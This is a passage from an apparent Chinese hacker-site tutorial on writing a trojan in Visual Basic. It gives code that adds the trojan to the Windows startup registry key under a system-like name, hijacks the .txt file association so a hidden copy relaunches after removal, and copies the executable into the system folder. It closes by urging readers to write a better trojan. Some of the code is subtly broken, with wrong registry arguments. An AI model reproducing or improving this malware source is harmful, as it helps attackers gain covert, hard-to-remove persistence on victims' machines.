回到Server工程中的modApi中加入如下API函数:
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Const REG_BINARY = 3 Public Const REG_SZ = 1 Public Const HKEY_LOCAL_MACHINE = &H80000002 Public Const HKEY_CLASSES_ROOT = &H80000000
写到注册表启动组中的过程。
Public Sub StartupGroup() Dim sKey As String Dim result As Long Dim hKeyID As Long Dim sKeyVal As String sKey = "Systrsy" ''启动组中的键,找一个与系统文件相近的。 sKeyVal = "C:/windows/system/systrsy.exe" ''木马文件的路径,可以用GetSystemDirectory来取 得系统路径。 result = RegOpenKey(HKEY_LOCAL_MACHINE, _ "Software/Microsoft/Windows/CurrentVersion/Run", hKeyID) If result = 0 Then result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, Len(sKey) + 1) End If End Sub
好,就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:
Public Sub WriteToTxt() Dim result As Long Dim hKeyID As Long Dim skey As String Dim skeyVal As String skey = "txtfile/shell/open/command" skeyVal = "C:/windows/system/txtView.exe" result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID) If result = 0 Then result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1) End If End Sub
肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:/windows/system/
txtView.exe是哪里来的,我们的木马是C:/windows/system/systrsy.exe呀。这可是我们木马的分身了。
好,回到Server工程的Server窗体的form_Load中,加入如下代码:
Dim sCurrentPath As String, sSystemDir As String sCurrentPath = App.Path & "/" & App.EXEName & ".exe" sSystemDir = “C:/windows/system” On Error Resume Next ''复制文件成系统目录下的Systrsy.exe FileCopy sCurrentPath, sSystemDir & "/Systrsy.exe" On Error Resume Next 复制文件成系统目录下的txtView.exe FileCopy sCurrentPath, sSystemDir & "/txtView.exe" 调用 Call startupGroup Call WriteToTxt ''判断程序是否下在运行 If App.PrevInstance Then ''如果已经运行就退出。 End End If
好了,写到这里一个破坏性木马已经诞生了,我实验过还是比较好的一个,希望大家也能写一个好的木马,能突破冰河。
注意:
1、大家在处理端口是最好使用高端端口,否则会和一些常用端口发生冲突。
2、在第一次使用VB.NET的最好看看有关的图书,可能你能写出一款超级木马也说不定。
http://www.cnxhacker.com/Article/program/hacker/200612/7383.html
